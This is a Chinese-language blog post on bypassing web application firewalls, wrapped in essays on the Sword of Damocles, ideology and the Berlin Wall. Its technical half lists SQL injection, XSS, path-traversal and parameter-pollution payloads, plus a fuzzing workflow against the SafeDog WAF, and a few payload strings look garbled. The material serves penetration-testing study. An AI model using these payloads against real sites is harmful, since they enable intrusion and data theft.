<!DOCTYPE html>
<html lang="zn">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="keywords" content="Hexo Theme Redefine">
    <meta name="description" content="IcMl0x824">
    <meta name="author" content="IcMl0x24">
    <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-redefine.png">
    
    <!--- Seo Part-->
    
    <link rel="canonical" href="http://example.com/2023/03/14/bypass/"/>
    <meta name="robots" content="index,follow">
    <meta name="googlebot" content="index,follow">
    <meta name="revisit-after" content="1 days">
    <meta property="og:type" content="article">
    <meta property="og:title" content="BypassWAF&amp;僭主狄奥尼修斯二世与达摩克里斯的意识形态对抗">
    <meta property="og:description" content="IcMl0x824">
    <meta property="og:url" content="http://example.com2023/03/14/BYPASS/">
    
    <meta property="og:site_name" content="IcMl0x24 &#39;s Blog">
    <meta name="twitter:card" content="summary_large_image">
    <meta name="twitter:title" content="BypassWAF&amp;僭主狄奥尼修斯二世与达摩克里斯的意识形态对抗">
    <meta name="twitter:description" content="IcMl0x824">
    <meta name="twitter:image" content="https://icml0x824.oss-cn-hangzhou.aliyuncs.com/202303141839090.png">
    <!--- Icon Part-->
    <link rel="icon" type="image/png" href="https://icml0x824.oss-cn-hangzhou.aliyuncs.com/202303141839090.png" sizes="192x192">
    <link rel="apple-touch-icon" sizes="180x180" href="https://icml0x824.oss-cn-hangzhou.aliyuncs.com/202303141839090.png">
    <meta name="theme-color" content="#0066cc">
    <link rel="shortcut icon" href="https://icml0x824.oss-cn-hangzhou.aliyuncs.com/202303141839090.png">
    
    <title>
        
            BypassWAF&amp;僭主狄奥尼修斯二世与达摩克里斯的意识形态对抗 -
        
        IcMl0x24 &#39;s Blog
    </title>
    
<link rel="stylesheet" href="/css/style.css">

    
<link rel="stylesheet" href="/assets/fonts.css">

    
    
    
    <script id="hexo-configurations">
    let REDEFINE = window.REDEFINE || {};
    REDEFINE.hexo_config = {"hostname":"example.com","root":"/","language":"zn"};
    REDEFINE.theme_config = {"toc":{"enable":true,"number":true,"expand_all":true,"init_open":true},"style":{"primary_color":"#0066cc","avatar":"https://icml0x824.oss-cn-hangzhou.aliyuncs.com/202303141839090.png","favicon":"https://icml0x824.oss-cn-hangzhou.aliyuncs.com/202303141839090.png","og_image":{"enable":false,"image_url":null},"article_img_align":"center","right_side_width":"210px","content_max_width":"1000px","nav_color":{"left":"#f78736","right":"#367df7","transparency":35},"hover":{"shadow":true,"scale":true},"first_screen":{"enable":true,"background_image":{"light":"/images/wallhaven-wqery6-light.webp","dark":"/images/wallhaven-wqery6-dark.webp"},"title_color":{"light":"#fff","dark":"#d1d1b6"},"font_sizes":{"title":"2.8rem","subtitle":"1.5rem"},"line_height":1.2,"title":"济州岛山茶花 IcMl0x824","subtitle":{"enable":false,"list":[]},"custom_font":{"enable":false,"font_family":null,"font_url":null}},"scroll":{"progress_bar":{"enable":true},"percent":{"enable":true}}},"local_search":{"enable":false,"preload":true},"code_block":{"copy":true,"style":"mac","custom_font":{"enable":false,"font_family":null,"font_url":null}},"pjax":{"enable":true},"lazyload":{"enable":true},"version":"1.2.1","friend_links":{"columns":2},"home_article":{"date_format":"auto","category":{"enable":true,"limit":3},"tag":{"enable":true,"limit":3}},"plugins":{"aplayer":{"enable":false,"audio":[{"name":null,"artist":null,"url":null,"cover":null},{"name":null,"artist":null,"url":null,"cover":null}]},"mermaid":{"enable":false,"version":"9.3.0"}}};
    REDEFINE.language_ago = {"second":"%s seconds ago","minute":"%s minutes ago","hour":"%s hours ago","day":"%s days ago","week":"%s weeks ago","month":"%s months ago","year":"%s years ago"};
  </script>
    
    
<link rel="stylesheet" href="/fontawesome/fontawesome.min.css">

    
<link rel="stylesheet" href="/fontawesome/brands.min.css">

    
<link rel="stylesheet" href="/fontawesome/solid.min.css">

    
<link rel="stylesheet" href="/fontawesome/regular.min.css">

    
    
    
    
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
<div class="progress-bar-container">
    
        <span class="scroll-progress-bar"></span>
    

    
        <span class="pjax-progress-bar"></span>
        <span class="pjax-progress-icon">
            <i class="fa-solid fa-circle-notch fa-spin"></i>
        </span>
    
</div>


<main class="page-container">

    

    <div class="page-main-content">

        <div class="page-main-content-top">
            <header class="menu-wrapper">
    
    <div class="menu-content">
        <div class="left">
            
            <a class="logo-title" href="/">
                
                IcMl0x24 &#39;s Blog
                
            </a>
        </div>

        <div class="right">
            <!-- PC -->
            <div class="pc">
                <ul class="menu-list">
                    
                        
                            <li class="menu-item">
                                <!-- Menu -->
                                <a class="" 
                                    href="/"  >
                                    
                                        
                                            <i class="fa-regular fa-house"></i>
                                        
                                        HOME
                                    
                                </a>
                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            <li class="menu-item">
                                <!-- Menu -->
                                <a class="" 
                                    href="/archives"  >
                                    
                                        
                                            <i class="fa-regular fa-archive"></i>
                                        
                                        ARCHIVES
                                    
                                </a>
                                <!-- Submenu -->
                                
                            </li>
                    
                    
                </ul>
            </div>
            <!-- Mobile -->
            <div class="mobile">
                
                <div class="icon-item menu-bar">
                    <div class="menu-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <!-- Mobile drawer -->
    <div class="menu-drawer">
        <ul class="drawer-menu-list">
            
                
                    <li class="drawer-menu-item flex-center">
                        <a class="" 
                        href="/"  >
                             
                                
                                    <i class="fa-regular fa-house"></i>
                                
                                HOME
                            
                        </a>
                    </li>
                    <!-- Submenu -->
                    
            
                
                    <li class="drawer-menu-item flex-center">
                        <a class="" 
                        href="/archives"  >
                             
                                
                                    <i class="fa-regular fa-archive"></i>
                                
                                ARCHIVES
                            
                        </a>
                    </li>
                    <!-- Submenu -->
                    
            

        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="page-main-content-middle">

            <div class="main-content">

                
                    <div class="fade-in-down-animation">
    <div class="post-page-container">
        <div class="article-content-container">

            
            
                <div class="article-title">
                    <h1 class="article-title-regular">BypassWAF&amp;僭主狄奥尼修斯二世与达摩克里斯的意识形态对抗</h1>
                </div>
            
                
            

            
                <div class="article-header">
                    <div class="avatar">
                        <img src="https://icml0x824.oss-cn-hangzhou.aliyuncs.com/202303141839090.png">
                    </div>
                    <div class="info">
                        <div class="author">
                            <span class="name">IcMl0x24</span>
                            
                                <span class="author-label">Lv1</span>
                            
                        </div>
                        <div class="meta-info">
                            <div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fa-regular fa-pen-fancy"></i>&nbsp;
        <span class="pc">2023-03-14 19:19:42</span>
        <span class="mobile">2023-03-14 19:19</span>
        <span class="hover-info">Created</span>
    </span>
    
        <span class="article-date article-meta-item">
            <i class="fa-regular fa-wrench"></i>&nbsp;
            <span class="pc">2023-03-14 19:20:34</span>
            <span class="mobile">2023-03-14 19:20</span>
            <span class="hover-info">Updated</span>
        </span>
    

    
    
        <span class="article-tags article-meta-item">
            <i class="fa-regular fa-tags"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/tags/BypassWAF/">BypassWAF</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    

    
    
    
    
        <span class="article-pv article-meta-item">
            <i class="fa-regular fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
        </span>
    
</div>

                        </div>
                    </div>
                </div>
            

            <div class="article-content markdown-body">
                <h3 id="引入独白前言"><a href="#引入独白前言" class="headerlink" title="引入独白前言"></a>引入独白前言</h3><p>我其实也很好奇为什么我会把 <strong>僭主狄奥尼修斯二世与达摩克里斯的意识形态对抗</strong> 这样一个与BypassWAF技术毫无相关的话题作为标题，或许我想表达的可能就是生生不息的对抗的意味。熟悉常见WAF也好，知道一些比较敏感的政治产品也罢，这些与这篇文章毫无关联，我们今天只是凭借着哲学思考来聊聊技术。一把悬在头顶的达摩克里斯之剑，警惕的告诉我们要活在当下，不要看清未来，不要开动大脑，不要自我思考。今天的 Bypass ——“意识形态对抗”</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://icml0x824.oss-cn-hangzhou.aliyuncs.com/202302211224876.jpeg"
                      alt="达摩克利斯之剑"
                ></p>
<h3 id="上层规则游戏"><a href="#上层规则游戏" class="headerlink" title="上层规则游戏"></a>上层规则游戏</h3><p>达摩克利斯是公元前4世纪意大利叙拉古的僭主狄奥尼修斯二世的朝臣，他非常喜欢奉承狄奥尼修斯。他奉承道：作为一个拥有权力和威信的伟人，狄奥尼修斯实在很幸运。狄奥尼修斯提议与他交换一天的身份，那他就可以尝试到首领的命运。在晚上举行的宴会里，达摩克利斯非常享受成为国王的感觉。当晚餐快结束的时候，他抬头才注意到王位上方仅用一根马鬃悬挂着的利剑。他立即失去了对美食和美女的兴趣，并请求僭主放过他，他再也不想得到这样的幸运。达摩克利斯之剑通常被用于象征这则传说，代表拥有强大的力量非常不安全，很容易被夺走，或者简单来说，就是感到末日的降临。达摩克利斯之剑的木刻图片出现在16世纪和17世纪欧洲书籍图案上。达摩克利斯之剑同时也是电影《洛奇恐怖晚会》中一首曲的标题，首次播出是1975年。严谨来说达摩克利斯是一个后来才被加入希腊文化的独立道德轶事中出现的人物形象。这个形象正确来说属于传奇，而不是希腊神话。轶事出现在陶尔米纳的提麦奥斯（公元前356年－公元前260年）所写的西西里岛失去的历史中。西赛罗可能在狄奥多罗斯·西库鲁斯的作品中读到它，并在其著作《Tusculan Disputations》V.21中加以引用。</p>
<p>一个高度敏感的人一定具有强烈的直觉和自我意识，富有洞察力和理解力，比他人更能感受深层次的信息，有巨大的共情力。像世界上许多伟大的作家诗人，比如卡夫卡，太宰治，普鲁斯特，他们创造伟大文学艺术的同时要承受巨大的精神痛苦，也由于这些原因他们的身体都损坏了。如果上帝提出要夺走这种虽然利于创作但于身体有害的能力，想必他们也是不愿意的，甚至这正是他们害怕失去的一种能力。在某个领域十分厉害的人物总是无法接受有人比他们更厉害。这些人拥有世间的某种顶级力量或优势，然而他们最恐惧的正来自于此，这种危机感时刻紧紧跟随他内心的脚步，这大概就是他们头顶上悬挂的达摩克利斯之剑。大凡在某一方面超凡出众的人，与这个社会常常就会格格不入。如果不把自己伪装成平庸的普通人，那就容易遭到身陷险境的危险。就像那位先知，或者麻疯病人，想要在人群中出没，就必须戴上面具。</p>
<h3 id="意识形态对抗"><a href="#意识形态对抗" class="headerlink" title="意识形态对抗"></a>意识形态对抗</h3><p>拉斯韦尔《政治学》中说到：一种公认的意识形态是能够自己长期存在下去的，不需要那些受益最多的人去进行什么有计划的宣传。当有人为了寻求传播某种信念的方法而煞费苦心的时候，就表明该信念早已奄奄一息了，社会的基本前景已经衰败了；要不就是一种新的胜利的前景还没有获得男女老少各色人等的自发的忠诚。一个对自己的国家感到毫无忧虑的人多么幸福啊！至少少数几个从普遍默认中得到主要好处的人多么幸福啊！在群众受着信心的驱使，而精英又满怀自信的情况下，那些将特殊利益给予他人的生活制度是没有必要去搞什么阴谋诡计之类的活动的。</p>
<p>生活在自己所信服的主流意识形态中的人会感到十分幸福，而生活在自己不信服的意识形态中的人会很痛苦。传统的社会共同体的解体（传统儒家社会，基督教社会等，上帝已死），使得每个人都是孤独的，群体性孤独，进而引起焦虑，对终极意义的寻求也得不到答案，而意识形态可以将孤独的内心纳入其中，这是意识形态产生的必然性，它是现代政治的产物。</p>
<p>意识形态本身最根本的因素是其说服力，但社会意识形态霸权的作用也是不可忽略的。小粉红是正常的现象，恰恰说明我们的社会意识形态运转正常。粉红和白色之间可以争论，但不应该有外力来打压任何一方。如果一套意识形态没有竞争者，不能够被讨论，他的解释力一定会变得越来越弱。没有竞争者才是最危险的，如果必须要通过暴力来维护某种意识形态，这个意识形态就非常危险了。</p>
<blockquote>
<p>引用自知乎作者：何妨一饮茶主人 《政治学概论第八讲：意识形态》</p>
</blockquote>
<h3 id="Bypass柏林墙"><a href="#Bypass柏林墙" class="headerlink" title="Bypass柏林墙"></a>Bypass柏林墙</h3><p>Web应用防护系统也称为：网站应用级入侵防御系统。英文名叫做Web Application Firewall，简称WAF。 利用国际上公认的一种说法：Web应用防火墙是通过执行一系列针对HTTP&#x2F;HTTPS的安全策略来专门为Web应用提供保护的一款产品。 在日常的渗透测试当中遇到了拥有WAF防护的网站，当黑客发送带有payload的数据包时则会被防火墙阻断，所以通过特定的方式与手法技巧绕过防护就成为Bypass。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://icml0x824.oss-cn-hangzhou.aliyuncs.com/202302211252319.jpeg"
                      alt="Web Application Firewall(WAF)"
                ></p>
<p>WAF其实就是在网站服务器前面提供一层过滤攻击流量的功能。与传统的 Firewall (防火墙) 不同，WAF 针对的是应用层。WAF按照国际标准来说有两种类型，SaaS型WAF和负载均衡型WAF。SaaS型WAF通过DNS解析，将域名解析到WAF集群提供的CNAME地址上，通过WAF配置源站服务器IP，实现域名恶意流量清洗和过滤，将正常流量回源到源站。负载均衡型WAF通过和负载均衡集群进行联动，将负载均衡的HTTP&#x2F;HTTPS流量镜像到WAF集群，WAF进行旁路威胁检测和清洗，将用户请求的可信状态同步到负载均衡集群进行威胁拦截或放行。WAF也可以分为非嵌入型WAF和嵌入型WAF</p>
<ul>
<li>非嵌入型是指硬WAF、云WAF、软WAF之类</li>
<li>嵌入型是指web容器模块类型WAF、代码层WAF</li>
</ul>
<p>也可以通过WAF提供在部署的方式上分成三类</p>
<ol>
<li>云WAF：通常是CDN包含的WAF,DNS需要解析到CDN的IP上去，在请求URL时，数据包就会先经过云WAF进行检测，如果通过再将数据包流给主机。常见产品：阿里云防护，腾讯与防护，创于云等。</li>
<li>铁盒子:硬件WAF可以理解为流量代理，一般部署方式都需要流量经过他，针对数据包进行拆包-清洗-规则名-放行&#x2F;丢弃。常见产品：各产品铁盒子WAF</li>
<li>软件类:在主机上预先安装了这种防护软件，和监听WEB端口的流量是否有恶意的，所以这种从功能上讲，较为全面。常见产品：云锁，安全狗等。</li>
</ol>
<p>为什么柏林墙一定会被推倒？</p>
<ol>
<li>波兰和匈牙利实行政治改革，放松了对边界的控制，使得东欧人民可以通过这些国家前往西方。</li>
<li>苏联领导人戈尔巴乔夫提出了“新思维”和“改革开放”的政策，表示不会干涉东欧国家的内政，并支持他们进行民主化改革。</li>
<li>东德面临严重的经济危机和社会动荡，民众对苏共政权的不满日益增加，要求实行自由选举和旅行自由。</li>
<li>1989年10月18日，东德领导人霍涅克被迫辞职，新任领导人开贝尔试图缓解局势，但未能平息民众的抗议浪潮。</li>
<li>1989年11月9日晚上，在一场混乱的新闻发布会上，东德官员宣布将放宽出境限制，并误传说这一决定即刻生效。</li>
<li>大批东柏林居民涌向边界检查站，并要求进入西柏林。</li>
<li>由于没有接到明确指示，边防部队最终选择开放通道，并没有使用武力阻止人群。</li>
<li>越来越多的人开始砸毁、涂鸦、攀爬柏林墙，并与西方友人欢庆团聚。</li>
</ol>
<p>所以说：业务与安全存在一定冲突，其次WAF无法百分百覆盖语言，中间件，数据库的特性，可能WAF本身就存在着不可中和的漏洞。所以说僭主狄奥尼修斯二世与达摩克里斯的意识形态对抗差不多可以理解为………………………………………………………………….</p>
<h3 id="Bypass取巧法"><a href="#Bypass取巧法" class="headerlink" title="Bypass取巧法"></a>Bypass取巧法</h3><h4 id="将军真实攻击"><a href="#将军真实攻击" class="headerlink" title="将军真实攻击"></a>将军真实攻击</h4><p>在具真实WAF的渗透测试场景中，用户-网站的访问流程如下：</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">用户 &gt; WAF &gt; 网站服务</span><br></pre></td></tr></table></figure></div>

<p>如果通过修改hosts文件来重新获取DNS解析的方式将访问的流程进行调整则可以直接跳过WAF的检测</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">用户 &gt; 网站服务</span><br></pre></td></tr></table></figure></div>

<p>所以寻找到真实IP在应对云WAF的场景中则会是很好用的策略。这也就是说为什么在信息收集中寻找真实IP是比较重要的</p>
<h4 id="无规则攻击"><a href="#无规则攻击" class="headerlink" title="无规则攻击"></a>无规则攻击</h4><p>常见WAF在阻断的过程中，WAF基本是靠采用正则表达式或基于行为判定的方式进行阻断。但是WAF在对于没有明确的规则攻击方式就会非常疲惫，比如一些逻辑漏洞、CSRF之类的漏洞</p>
<h3 id="Bypass硬刚法"><a href="#Bypass硬刚法" class="headerlink" title="Bypass硬刚法"></a>Bypass硬刚法</h3><h4 id="绕过参数认证"><a href="#绕过参数认证" class="headerlink" title="绕过参数认证"></a>绕过参数认证</h4><p>假如WAF会从参数名中删除空格或将其转换为下划线或者删除参数后面跟着两个十六进制数字的%字符</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://xxx.com/test.php?%20testid=select 1,2,3</span><br></pre></td></tr></table></figure></div>

<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://xxx.com/test.aspx?%testid=select 1,2,3</span><br></pre></td></tr></table></figure></div>

<p>即通过这种方式绕过不拒绝未知参数的WAF</p>
<h4 id="加载WAF的负载"><a href="#加载WAF的负载" class="headerlink" title="加载WAF的负载"></a>加载WAF的负载</h4><p>如果WAF性能负载过重的情况下，可能会跳过输入验证。通常可以发送大量的恶意请求。这对于嵌入式WAF或许更适用。</p>
<h4 id="HTTP参数污染"><a href="#HTTP参数污染" class="headerlink" title="HTTP参数污染"></a>HTTP参数污染</h4><p>发送多个同名的参数，如：</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">http://xxx.com/test/?test=1&amp;test=2</span><br><span class="line"></span><br><span class="line">ASP.NET中，会处理成test=1,2</span><br><span class="line">JSP中，会处理成test=1</span><br><span class="line">PHP中，会处理成test=2</span><br></pre></td></tr></table></figure></div>

<p>所以当payload为test&#x3D;select 1,2,3 from tables的时候，可以将其改变为：</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">test=select 1&amp;select 2,3 from tables</span><br></pre></td></tr></table></figure></div>

<h4 id="双重URL编码"><a href="#双重URL编码" class="headerlink" title="双重URL编码"></a>双重URL编码</h4><p>WAF会将URL编码的字符规范化为ASCII文本，所以使用双重编码可能会导致绕过。</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">s --&gt; %73 --&gt;%25%37%33</span><br></pre></td></tr></table></figure></div>

<p>所以可以将payload修改成双重URL编码的格式</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1 union %25%37%33elect 1,2,3</span><br></pre></td></tr></table></figure></div>

<h4 id="使WAF未检测到对应的规则"><a href="#使WAF未检测到对应的规则" class="headerlink" title="使WAF未检测到对应的规则"></a>使WAF未检测到对应的规则</h4><p>在找到缺少的规则方式中，需要有一定的流程设计，例如将WAF部署好后，关闭拉黑的机制，然后进行fuzz的测试。为此，整个的测试当中，如果以目的为导向的话，那么的目的是找到一条一句的方式，WAF不认为是恶意语句，但这条的恶意语句可以在网站中执行。在SQL注入的绕过中，可以尝试的语法方式：</p>
<p>原本语句  ’ or 1&#x3D;1</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">or 9=9</span><br><span class="line">or 0x47 = 0x47 --&gt;ASCII</span><br><span class="line">or char(32) = &#x27;&#x27;</span><br><span class="line">or 9 is not null</span><br></pre></td></tr></table></figure></div>

<p>原本语句 1+union+select+1,2,3&#x2F;*</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">1/*union*/union/*select*/select+1,2,3/* </span><br><span class="line">1/*uniXon*/union/*selXect*/select+1,2,3/*</span><br><span class="line">UNION ALL SELECT</span><br></pre></td></tr></table></figure></div>

<p>其他的绕过方式</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">id=-15 uNloN sELecT 1,2,3,4</span><br><span class="line">id=-15&amp;nbsp;UNlunionON SELselectECT1,2,3,4 </span><br><span class="line">id=1%252f%252a*/UNION%252f%252a/SELECT </span><br><span class="line">id=-15/*!u%6eion*/ /*!se%6cect*/ 1, 2,3,4...SELECT(extractvalue(ox3C613E61646D6g6É3C2F613E,ox2f61) </span><br><span class="line">id=10%D6&#x27;%20AND%201=2%23 - SELECT &#x27;A&#x27;=&#x27;A&#x27;; #1</span><br></pre></td></tr></table></figure></div>

<p>在XSS中可以尝试：</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">原本为:Alert(&#x27;xss&#x27;)或Alert (1)</span><br><span class="line">Prompt(&#x27;xss&#x27;)</span><br><span class="line">Prompt(454)    </span><br><span class="line">Confirm(&#x27;xss&#x27;) </span><br><span class="line">Confirm(123)</span><br><span class="line">Alert(/xss/.source) </span><br><span class="line">Window[/alert/.source](8)</span><br><span class="line"></span><br><span class="line">原本为:alert(document[&#x27;cookie&#x27;])</span><br><span class="line">alert(document[/coo/.source+/kie/.source])</span><br><span class="line">alert(document[/cookie/.source])</span><br><span class="line">with(document)alert(cookie)</span><br><span class="line">alert(document.cookie)</span><br><span class="line"></span><br><span class="line">原本为: &lt; img src=x onerror=alert(1);&gt; 或javascript:alert(document.cookie)</span><br><span class="line">&lt;svg/onload=alert(1)&gt;</span><br><span class="line">&lt;video src=x onerror=alert(1);&gt;</span><br><span class="line">&lt;audio src=x onerror=alert(1);&gt;</span><br><span class="line">Data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=</span><br></pre></td></tr></table></figure></div>

<p>在文件包含中，可以尝试：</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">原本为:/etc/passwd</span><br><span class="line"></span><br><span class="line">/too/abc/etc/far/.../passwd</span><br><span class="line">/../../../../etc/passwd%oo</span><br><span class="line">/etc//passwd</span><br><span class="line">/etc/ignore/../passwd</span><br><span class="line">/etc/passwd....</span><br></pre></td></tr></table></figure></div>

<p>测试方法就很多很多了，推荐几篇文章或者自己搜一搜了解即可：<a class="link"   target="_blank" rel="noopener" href="https://cloud.tencent.com/developer/article/1944119" >实战 | WAF-Bypass之SQL注入绕过思路总结 - 腾讯云开发者社区-腾讯云 (tencent.com) <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></p>
<h3 id="FUZZ大法好啊"><a href="#FUZZ大法好啊" class="headerlink" title="FUZZ大法好啊"></a>FUZZ大法好啊</h3><p>假设测试环境是安全狗，这里有一句常见的SQL注入语句对吧，正常测试下我们怎么做？</p>
<div class="highlight-container" data-rel="Sql"><figure class="iseeu highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1000</span><span class="string">&#x27;union select user,password from pikachu.users#</span></span><br></pre></td></tr></table></figure></div>

<p>使用FUZZ工具生成大量的Payload</p>
<div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 FUZZ.py -p <span class="string">&quot;1000&#x27;union select user,password from pikachu.users#&quot;</span> -l 3 -o 1</span><br></pre></td></tr></table></figure></div>

<p>然后把生成的Payload放到Burp中进行FUZZ，然后跑＋清洗出可用的Payload</p>
<p>最后在开启安全狗的情况下，使用清洗后的Payload进行大量Fuzz，找到可以成功Bypass的Payload即可</p>
<p>这是一种基本的思路，从SQL注入绕过到其他，无非都是这个思路。</p>
<h3 id="The-Sword-of-Damocles"><a href="#The-Sword-of-Damocles" class="headerlink" title="The Sword of Damocles"></a>The Sword of Damocles</h3><p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://icml0x824.oss-cn-hangzhou.aliyuncs.com/202302211331141.jpeg"
                      alt="The Sword of Damocles, Giuseppe Piattoli (Italian, documented Florence, 1785–1807), Pen and brown ink, brush and  brown wash "
                ></p>

            </div>

            
                <div class="post-copyright-info">
                    <div class="article-copyright-info-container">
    <ul>
        <li>Post title：BypassWAF&amp;僭主狄奥尼修斯二世与达摩克里斯的意识形态对抗</li>
        <li>Post author：IcMl0x24</li>
        <li>Create time：2023-03-14 19:19:42</li>
        <li>
            Post link：https://icml8.github.io/2023/03/14/BYPASS/
        </li>
        <li>
            Copyright Notice：All articles in this blog are licensed under <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh">BY-NC-SA</a> unless stating additionally.
        </li>
    </ul>
</div>

                </div>
            

            
                <ul class="post-tags-box">
                    
                        <li class="tag-item">
                            <a href="/tags/BypassWAF/">#BypassWAF</a>&nbsp;
                        </li>
                    
                </ul>
            

            

            
                <div class="article-nav">
                    
                    
                        <div class="article-next">
                            <a class="next"
                            rel="next"
                            href="/2023/03/14/CHATGPT/"
                            >
                                <span class="title flex-center">
                                    <span class="post-nav-title-item">遗失的火种&amp;被缚的普罗米修斯&amp;我们是来埋葬ChatGPT的，而不是来赞美它的</span>
                                    <span class="post-nav-item">Next posts</span>
                                </span>
                                <span class="right arrow-icon flex-center">
                                    <i class="fa-solid fa-chevron-right"></i>
                                </span>
                            </a>
                        </div>
                    
                </div>
            


            
        </div>

        
            <div class="toc-content-container">
                <div class="post-toc-wrap">
    <div class="post-toc">
        <div class="toc-title">On this page</div>
        <div class="page-title">BypassWAF&amp;僭主狄奥尼修斯二世与达摩克里斯的意识形态对抗</div>
        <ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%BC%95%E5%85%A5%E7%8B%AC%E7%99%BD%E5%89%8D%E8%A8%80"><span class="nav-number">1.</span> <span class="nav-text">引入独白前言</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%B8%8A%E5%B1%82%E8%A7%84%E5%88%99%E6%B8%B8%E6%88%8F"><span class="nav-number">2.</span> <span class="nav-text">上层规则游戏</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%84%8F%E8%AF%86%E5%BD%A2%E6%80%81%E5%AF%B9%E6%8A%97"><span class="nav-number">3.</span> <span class="nav-text">意识形态对抗</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Bypass%E6%9F%8F%E6%9E%97%E5%A2%99"><span class="nav-number">4.</span> <span class="nav-text">Bypass柏林墙</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Bypass%E5%8F%96%E5%B7%A7%E6%B3%95"><span class="nav-number">5.</span> <span class="nav-text">Bypass取巧法</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%B0%86%E5%86%9B%E7%9C%9F%E5%AE%9E%E6%94%BB%E5%87%BB"><span class="nav-number">5.1.</span> <span class="nav-text">将军真实攻击</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%97%A0%E8%A7%84%E5%88%99%E6%94%BB%E5%87%BB"><span class="nav-number">5.2.</span> <span class="nav-text">无规则攻击</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Bypass%E7%A1%AC%E5%88%9A%E6%B3%95"><span class="nav-number">6.</span> <span class="nav-text">Bypass硬刚法</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%BB%95%E8%BF%87%E5%8F%82%E6%95%B0%E8%AE%A4%E8%AF%81"><span class="nav-number">6.1.</span> <span class="nav-text">绕过参数认证</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%8A%A0%E8%BD%BDWAF%E7%9A%84%E8%B4%9F%E8%BD%BD"><span class="nav-number">6.2.</span> <span class="nav-text">加载WAF的负载</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#HTTP%E5%8F%82%E6%95%B0%E6%B1%A1%E6%9F%93"><span class="nav-number">6.3.</span> <span class="nav-text">HTTP参数污染</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" 